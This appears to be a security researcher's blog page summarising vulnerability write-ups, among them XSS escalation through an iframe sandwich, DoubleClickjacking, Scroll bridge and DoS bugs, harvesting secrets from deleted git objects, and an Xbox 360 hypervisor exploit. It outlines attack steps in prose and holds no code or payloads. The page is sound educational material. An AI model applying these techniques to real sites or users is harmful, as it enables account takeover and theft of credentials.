About Project Blog Resources

Resources
People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Exacerbating Cross-Site Scripting: The Iframe Sandwich- 1646

Cooper Young Reference →Posted 10 Months Ago

In bug bounty, it's just about finding the vulnerability - it's about exploiting the vulnerability to create as much impact as possible. In the author's situation, they found XSS on a simple static website that wasn't connected very well to the rest of the application. This meant that session hijacking, account takeovers, and sensitive API calls were unlikely to work.
Their first exploit attempt was adding a login form to the page to trick the user into signing in and stealing the credentials. However, this requires too much interaction, making it a solid medium severity bug on its own.
To add more impact, they create an iFrame sandwich. In most cases, an iFrame cannot access its parent frame's contents. One exception: it can if they're on the same domain or a subdomain. Since this subdomain was for maps and showed on the main website, it could access the contents of the page, bypass SOP, use cookies, etc.
One question I had was how to get the main page to embed the vulnerable version of our page, since it is reflected XSS. To get around, the subdomain can be embedded into an attacker-controlled website where they specify the URL. But, this doesn't mean that the website's top-level site that we're trying to get data from is vulnerable, though.
The other trick is getting the parent of the iFrame to have access to the other page. To do this, an important order of operations is done:
1. Attacker website opens up the page to do the exploitation via window.open().
2. Attacker sets the window.location to be the target page. The parent window of the page opened in step 1 is STILL this window, even though we opened a new page.
3. The page opened in step 1 contains an iFrame with the exploit payload in it targeting the subdomain page.
4. The iFrame accesses the parent reference of the page, now on the website we want to exfilitrate data from. Cookies can be shown, the DOM edited... this is super powerful!
The end of the article discusses the security team of the product and the security researcher. The researcher's job is to write a powerful and impactful exploit; the researcher bears the burden of proof. To the security team, the PoC is the minimum impact.
Unfortunately, the security team deemed this out of scope since the subdomain was out of scope. They fixed the vulnerability though. Personally, if you affect an in-scope item with a vulnerability outside of the scope, you should be rewarded. Attackers do not care about "scope" - they care about impact. Fantastic blog post!

Scroll Mainnet Emergency Upgrade- 1645

Scroll Security Council Reference →Posted 10 Months Ago

Scroll is a ZK EVM blockchain. Recently, they made some changes to the code that led to some pretty serious issues. One via an individual and another through Immunefi by a user named WhiteHatMage.
The first bug was a soundness issue in the zkEVM circuit for the auipc opcode. This function used an iterator that skipped the first element. That led to the bits of the PC being ranged checked to 8-bits instead of 6-bits. This would have allowed a malicious prover to fill in arbitrary values in the higher 2 bits of the PC, changing the flow of execution.
Any ZK soundness issue is bad but the exploitable impact is unknown. Since the prover and sequencer are operated by Scroll, this is unexploitable though. The fix for this vulnerability is literally swapping the order of skip(1) and enumerate(). Neat!
The second vulnerability was a message spoofing issue on the bridge. For the Euclid phase-2 update, they made some big changes and had a full audit done that did not uncover the issue. From being in a Discord with the author of the bug, they had automation setup to notify them of changes to contracts on Scroll. While reviewing this, hours after release, they immediately saw the issue.
When going from an L1, like Ethereum to an L2 such as Scroll, there is typically a bridge in between them. When going between the L2 and the L1, there was an application-level permission issue that had not been noticed. On one end of the bridge, there was an authorization check. By crafting a malicious withdraw on the L2 to the L1, the L1ScrollMessenger entity permission could be abused to make a call back into the main bridge. Since this caller is considered trusted on L2ScrollMessenger, access controls on the L2 could be bypassed, leading to an infinite mint. This was effectively a confused deputy problem.
This wasn't exploitable in the past because EnforcedTxGateway did not allow calls from smart contract accounts. With the change to the code, this property was changed though. Hence, it was possible to trigger this path. The explanation is somewhat short and without context so I don't fully understand the bug though. As more details come out, I'll try to update.
Overall, two good bugs! The second one led to a 1M payout because of the damage it could have caused; monitoring for the win. It's fascinating the stark difference between the Scroll DoS from last week and this second crazy vulnerability.

DoubleClickjacking: A New Era of UI Redressing - 1644

Paulos Yibelo Reference →Posted 10 Months Ago

Clickjacking, also known as the UI Redress attack, is a mechanism to steal clicks to perform sensitive actions on a website. This is done by iFraming the victim website in the attackers website and tricking the user to clicking on particular sensitive parts of the website. With SameSite: Lax, the framed website becomes unauthenticated, making this much harder to exploit. This article is a new variant of this called Double Clickjacking.
The main idea is doing some sleight of hand trickery to make this possible via exploiting the small gap between the start a click and the end of a click in multiple windows. By quickly swapping between pages, it's possible to get a user to click on something in an unintended fashion. The video is the best demonstration of it but it's very fast. There are some more complications to how this works though.
1. The attacker creates an initial webpage. This opens a window.
2. When the new window opens up, they ask the user to "double click" on it.
3. Upon going to this page, the new window changes the parent window's location to the target page. This means that the parent window of our page while the top window shows the double-click prompt.
4. When the user does the double click, the mousedown causes the top window (the current page) to close.
5. The second click lands on the exposed authorization button on the parent window. With this, access has been granted.
The reason this works is because of the multiple parts each click. We can use part of the click and then force it to be someone else. Any sort of one click permissions can be abused on this, such as OAuth permissions or data sharing on Google Drive. This bypasses traditional clickjacking permissions like CSPs. This also isn't just about websites - it can affect chrome extensions as well.
To mitigate this, the author suggests disabling critical buttons unless a gesture is detected on that page. This ensures that the actions were meant for the particular page. For longer term solutions, a header could implemented that just resets all gestures. I really like that they thought of a good protection, which many folks wouldn't do.
The attack is really cool! I personally don't fully understand why each step happens but it's interesting none-the-less.

The Hidden Risks of Cosmos SDK: Unmetered Functions- 1643

Oak Security Reference →Posted 10 Months Ago

Blockchains have a concept known as gas. Like what you put in your car, it calculates how far you have gone. The only difference is that this one is computational complexity versus the distance on a road. In the Cosmos SDK, which is an application-specific blockchain, some of this gas handling becomes complicated and difficult to handle securely.
The Cosmos SDK has handlers that run at the beginning and the end of each block - BeginBlock and EndBlock respectively. Since these are not done in a particular transaction, they have unlimited gas. So, it's essential to be mindful of what gets executed in these functions when building your project.
The authors of the post created a Cosmos SDK blockchain locally to test how delays in these functions affected the blockchain's uptime. By adding sleeps at determinstic points within these functions, they noticed some funky things happened. Consensus would commonly timeout. Validators would miss voting windows, leading to slashing of stake.
A common exploitation method of this is to increase the number of items being processed in a list. Both of their examples are the processing of messages and processing of denoms in a linear list. I also wonder about the practicality of exploiting these types of issues. However, other ways exist to make these functions spend too much time.
They have a few suggestions to work around this. First, try to make all operations O(1). In reality, this isn't really possible, though. So, having hard upper bounds on iteration counts or run time limits is the way to go. Another option is having custom gas metered contexts that will eventually expire. Using custom gas meters has its own consequences, such as forcing rollbacks on the state if this happens because of the potential for partial operations.
Overall, a good and post on gas meters going wrong in Cosmos.

Proof of Nothing- 1642

Giuseppe Cocomazzi Reference →Posted 10 Months Ago

The term proof is used for loosely in the blockchain industry. Originally with Bitcoin, proof of work was used as an anti-spam technique. It relies on the probabilistic assumption takes a certain amount of time to find the correct pre-image of a hash. Hashes are sufficiently random so this is fairly reasonable. Based on all previous data, there's no reason this won't work in the future. It makes this for deductive than inductive.
Proof of Stake was popularlized by Tendermint. "Proof" relies on a majority of cryptographic validators (two-thirds power). With proof of stake, the current block is grounded in the previous one. All though the name implies some mathematical deduction, this is NOT a regular proof. This makes all of the blocks sequential to the other blocks.
Light clients follow the same logic, except they start with a trusted block that is provided at the beginning of the light client. Additionally, they can skip blocks with "Non-adjacent block verification" assuming that 2/3 from the most recent trusted block have signed on this block. Giuseppe doesn't like this. Why?
Two large induction leaps are being made:
- Any validator holding 1/3+ of the voting power at block height H continues to behave honestly for N blocks.
- Validator from the first point is no longer trusted at H+N.
Because the validator is trusted from Height H + N blocks, if they decide to be malicious for a period of time their proof is still technically valid! It doesn't matter that they were slashed on the other chain; it's still valid from the perspective of the light client. The consequences of not having perfectly sequential block validation is not great given the argument. But, to my knowledge, no hacks surrounding this have happened yet.
According to the author Skipping verification for non-adjacent blocks might very well be named "Proof of Faith" or, better, "Proof of Nothing". Interesting post around the design of Tendermint light client verification!

Scroll Chain DoS via CCC Overflows in Single User Transactions + Drama- 1641

Pavel Shabarkin Reference →Posted 10 Months Ago

In Scroll zkEVM rollups, transactions occur in two main steps:
1. EVM executes all transactions, performs state transitions and then sends the transaction to the provers.
2. zkEVM prover proves the traces.
This second step is known for being time consuming. So, due to this, there is a limited capacity. Scroll imposes a row consumption limit of transactions per block, rejects and reogs before finalizing if this happens.
If transaction traces exceed the row capacity, the zk prover will fail. Obviously, an unprovable block prevents the chain from finalizing and wastes resources. Scroll knew this and implemented the Circuit Capacity Checker (CCC) in l2-geth to validate transactions before they enter the zkEVM circuit. Wow! We're looking at remediations within remediations for bugs, crazy!
The mining process is as follows:
1. Transaction enter the mempool, where it's picked up by a worker.
2. Transactions are processed based upon gas price.
3. Each transaction is executed one by one.
4. Commit the block. If the CCC calculations failed, then rollback the block.
The CCC functions as a post-sealing check rather than a pre-sealing check. This enables an attacker to send a lot of malicious transactions that exceed the CCC limit but are totally valid otherwise. This means that a lot of computations are done (wasting time and resources) only for a reorg to happen.
The cool part is that since there's a reorg, there's no gas cost to the attacker! So, they can create an infinite amount of high gas price transactions to always be at the front of the queue to permanently stale the blockchain. Technically, it's interesting how they abused the issue.
Now... for the drama. The vulnerability was reported to Scroll who decided not to fix the issue. They had received multiple similar types of vulnerabilities in CCC and understood there were likely more. So, they had completely redesigned the feature but were just waiting until the next release to upgrade it.
Scroll and Immunefi agreed the vulnerability was legit. For the time being, Scroll was okay accepting this risk for the users and moving on, though. Because nothing was changed, no bug payout. The author of the report published the report on Twitter and a blog-like website, including full Immunefi chat logs. Some folks believe that the whitehat is in the right, while others think they are in the wrong. It's a sticky situation.
From the perspective of the bug hunter, I get it - there's a live vuln and a program you did research on. From the perspective of the project, I get it - you recognized a design weakness and already fixed it. In my opinion, there's nothing on the Scroll side to do besides push their new code. So, if they're okay with the risk they're taking on with a DoS until the upgrade, that's their decision to make.
When pushing for remediation on a bug bounty report, we got to be patient on things. Reading the communications, the bug hunter was pushing for comms faster than the SLA of Immunefi required and was very aggressive about it. Additionally, after being offered a bounty of 1K they pushed back and asked for a bounty of 200-300K. They even pushed up the severity of the bug citing the primacy of impact by creating some reasons on why the DoS was so bad.
Personally, I feel like the denial of service risk commonly referred to on projects gets more credit than it should. Realistically, if this attack was launched, the chain would be back up in less than a day with a hacky-solution for this issue. The numbers and impact the author cites for Token Sell-Off & Investor Confidence Crisis are a little ridiculous to me. Sure, a DoS on the chain has impact but not 200K bug bounty worth of impact. Besides my grieves with how it was handled, the blog post is very thorough and well-explained.

How Go Mitigates Supply Chain Attacks- 1640

Filippo Valsorda - Golang Reference →Posted 10 Months Ago

Most modern software has a large amount of open-source code. Because the code is constantly used and downloaded, it opens up the potential for supply chain attacks. Despite good process and technical chops, every dependency is an unavoidable trust relationship. This article discusses how Golang tries to mitigate these risks with very explicit design decisions.
In Golang, all builds are locked. The version of every dependency is set in the go.mod file. Only explicit updates to this file can change the dependencies, such as go get or go mod tidy. This is super important for security - the code in the repository for should be the source of truth and nothing else.
There is no concept of latest for dependencies. This prevents a dependency from being compromised by backdooring all of the users very quickly. Everything said above is also transitive for dependencies of dependencies as well. If a dependency is compromised, it requires a specific update as a result, giving folks time to see what's going on.
Version contents are guaranteed to never change - module versions are immutable. This property ensures that an existing package cannot be modified to compromise code that depends on it. So, if something is safe to run currently, we're confident it will be safe to run. A lot of cryptographic verification goes into this.
Another issue that I have with NPM is related to hooks or builds running code. Golang has no post-install hooks. Additionally, the built code cannot do anything until it is actually running. In all likelihood, if you installed something, you're probably going to run it, but this does add another security boundary, though.
Overall, a good look into supply chain security in Golang. I like to see that the developers put a lot of thought into the package manager of Golang.

How I made $64k from deleted files — a bug bounty story- 1639

Sharon Brizinov Reference →Posted 10 Months Ago

git is a distributed version control system used everywhere. Under the hood, the entire history of the repository is tracked. Git has blobs for the files, trees for the directory structure, and comments for snapshot information. A blob is a large binary object that is saved based upon the sha256 hash of the contents and is zlib compressed. Many of these are compressed into a single file called a pack when they are no longer referenced by other objects (dangling).
The commit history represents a snapshot of the repository at a point in time. They store a reference to a ree object, pointers to parent commits and metadata.
When a file is removed via git rm, they can still be accessed because the history is immutable. The data of a commit is stored forever in the .git/objects folder. Additionally, the pack files contain information that is no longer referenceable by normal means.
The author wanted to target all dangling objects by traversing commits with their parent commits. If a file was dangled and deleted, they dumped it to disk. More there, they would run the tool TruffleHog to check for secrets on the repo. TruffleHog supports over 800 different secret formats! They also have a verify-only flag that will check if the secret is valid or not.
My main question, which they cover, is why not just use TruffleHog from the beginning? It will often skip .pack files if they were too big. By uncompressing these ourselves with the mechanism from above, TruffleHog can do its magic like normal.
They scanned a crazy number of projects doing this. They found the organization names by looking at various GitHub repos with names, using the GitHub search and directly with repos over 5000 stars. All in all, they made 64K off of this research. This goes to show that novel research pays. There were a large number of false positives. In particular, dummy users for testing and canaries were very common.
Why does this happen so much? The author claims that many developers just don't understand how git works with regard to deleting files. Additionally, bad .gitignores including .env and binary files were common as well. Overall, great research!

Hacking the Xbox 360 Hypervisor Part 2: The Bad Update Exploit- 1638

Grimdoomer Reference →Posted 10 Months Ago

The author of this post was hunting for vulnerabilities in the XBox 360 hypervisor. While doing this, they noticed the system call HvxKeysExecute that allowed running small pieces of ad-hoc code in hypervisor mode with code signed from Microsoft. They pulled down 25 of these payloads and found a vulnerability in one of them: Bad Update.
The Bootloader Update Payload for the HvxKeysExecute instruction is the one being attacked. It reads data from kernel mode and performs LZX decompression on it. This requires a scratch buffer on store the data structure with lots of interesting pointers to jump tables and such. This buffer is relocated to encrypted memory but NOT protected mode. The idea is to overwrite this pointer to hijack the control flow later on.
Encrypted memory is a section of memory on the XBox that is in the Hypervisor but modifiable by the kernel. Because of this, it's typically only used in a write-only fashion. In the vulnerability above, we want to modify pointers that are encrypted and used by the Hypervisor. The encryption of this memory uses a per-boot key and a 10-bit whitening value that is unique to the address and cache line. This prevents simple oracles or reuse across resets/reboots.
There's still wiggle room for an encryption oracle here: we need an encryption oracle with a specific whitening value and just find an encryption oracle. Luckily, the encryption oracle is built into the Hypervisor with the HvxEncrypted set of APIs. For the whitening value, we need a known value for those that we can compare against for part of the contents. This means we have a complete oracle!
Encrypting arbitrary data with the whitening value matching allows one to edit the encrypted memory. First, they tried editing the malloc and free pointers - this didn't work because of cache-line issues. Instead, they overwrote the dec_output_buffer (output of the decompression process) pointer to get a controlled write to another unintended location. This gives a 0x8000 write primitive with uncontrolled data into the HyperVisor.
To turn this into code execution, they had to win a race condition and be able to execute it multiple times - the second of these made it much more difficult to do in practice, since it removed many interesting targets. From within one of the writable bootloader code segments, they found a stb/blr pair that gave them an arbitrary write primitive that could be written at the end of a system call within the Hypervisor.
This is inherently racy and wasn't very consistent. When the race condition is combined with the brute force of the whitening value, the exploit takes too long. To make this more consistent, they experimented with thread prioritization and monitoring of the code. With their current payload, the attack thread got the malicious ciphertext flushed to RAM the XKE payload was already done running. To fix this, they put the attack on hw thread 0 and the payload thread on hw thread 1 and put both of these on core 0. There are more details on winning the race but it's over my head.
This exploit is still inconsistent and time-consuming. However, the means of winning the race more often and modifying encrypted memory are still good insights into complex exploit development. The testing strategies used was also interesting to me. Good work!

Choosing an Audit Competition: How to Spot Snake Oil- 1637

Zellic Reference →Posted 10 Months Ago

Contest platforms in web3 are an alternative to standard security reviews. The auditing firm Zellic bought the contest platform CodeArena last year and has decided to write a report on metrics for audit contest information. Naturally, the platform wants to look better, but you've got to know when things are snake-oily. Imo, some of this just feels like a competitor bash (especially the screenshots that are obvious to know who they're calling out), but there are some good points.
The true benefit of audit competitions is the number of eyes and skills your code gets. A traditional audit is a low-hanging-fruit audit with known entities. In a contest, the participants are incentivized to find unique and high-impact issues. So, the coverage is better theoretically.
The first metric is finding count. Many of the findings reports include invalid issues or don't de-duplicate the issues to inflate the numbers. Teams only care about the high and medium severity bugs.
The next metric is participant numbers. There's a difference between participants and useful participants. Using a number with "participants who submitted a valid finding" would be much better. It's also hard to know how much time was actually spent on the code for those participants. However, this final point is true on all platforms.
The third one is "Claims about exclusivity". A general issue with contests is how you know good researchers are looking at your code. At Cantina, they have pre-paid folks to work on audits. On Sherlock, they have a Lead Watson who gets an automatic part of the prize pool.
Having full-time people on your platform is better than not having it at all. There's a concern if these folks are actually spending the time on your project. If they weren't, they would probably lose their contract with the contest platform. Their concerns are valid (are they on it the entire time, who is managing this, etc) but some it better than the none of C4.
Comparisons between audit contests and traditional audits are usually somewhat confusing. Severity scales are different, "fake" vulnerabilities are sometimes presented in both cases, and asymmetric comparisons are made on codebases that are either different projects or audited at different points. This is a fair call out.
It's good to consider the differences between the platforms to decide where to host competitions and participate as a hacker. This article has some good points but also has a very skewed perspective with A) being an auditing firm and B) owning C4. So, take the content with a grain of salt.